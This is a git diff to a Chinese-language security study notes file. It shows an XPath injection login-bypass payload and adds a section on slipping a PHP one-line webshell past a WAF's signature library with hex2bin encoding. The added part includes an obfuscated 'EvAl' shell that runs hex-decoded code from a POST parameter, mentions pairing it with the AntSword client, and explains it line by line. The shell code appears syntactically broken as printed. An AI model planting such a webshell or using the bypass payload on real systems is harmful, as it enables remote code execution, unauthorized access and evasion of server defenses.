--- a/安全学习笔记/【10】杂七杂八的记录.md
+++ b/安全学习笔记/【10】杂七杂八的记录.md
@@ -72,7 +72,7 @@ $result=$xml_>xpath(*/heroes/hero[login=‘"."’ and password=‘"."’)；
 
 Xpath注入的登录绕过
 
-payload `' or '1'='1' or '`payload （类似于mysql的万能密码）这个是可以不用输入密码的
+payload `' or '1'='1' or '`payload （类似于mysql的万能密码）这个是可以不用输入密 码的
 
 1'or '1'='1  这个是要输入密码的
 
@@ -85,6 +85,21 @@ html页面感觉是伪静态的
   javascript:alert(document.lastModified)
 
 查看页面最后的修改时间，如果得到的时间和现在时间一致，就是伪静态页面
+
+### 简单绕过waf的一句话处理hex2bin
+
+hex2bin 是php内的函数
+一句话用hex2bin编码。蚁剑也修改下成hex编码器。base64这些因为都在宝塔特征库里可能需要编码好几遍才过这里hex2bin一次就行
+
+```
+<?=ok;$b= 'echo "111"';function c(){return 'EvAl/**/{\hex2bin($GLOBALS["_POST"]["a"]));';}}$b=c();EvAl/**/($b);?>
+```
+
+* **`<?=ok;`** ：这部分是短标签形式的 PHP 语法，输出 `ok`。如果短标签在 PHP 配置中被禁用，这行代码不会输出任何内容。
+* **`$b= 'echo "111"';`** ：定义了一个变量 `$b`，它是一个字符串，内容为 `echo "111"`。
+* **`function c(){return 'EvAl/**/{\hex2bin($GLOBALS["_POST"]["a"]));';}`** ：定义了一个名为 `c` 的函数，该函数返回一个字符串。这个字符串看起来像是一个 PHP 函数调用，但被故意混淆了。
+* **`$b=c();`** ：调用函数 `c()`，将返回的字符串赋值给变量 `$b`。此时，`$b` 的内容变为 `EvAl/**/{\hex2bin($GLOBALS["_POST"]["a"]));`。
+* **`EvAl/**/($b);`** ：最后，调用 `EvAl` 函数并传入 `$b` 作为参数。注意，`EvAl` 可能是 `eval` 的一个变体，这意味着它会执行传入的 PHP 代码。
 
 ### XSS获取cookie 的简单payload
 
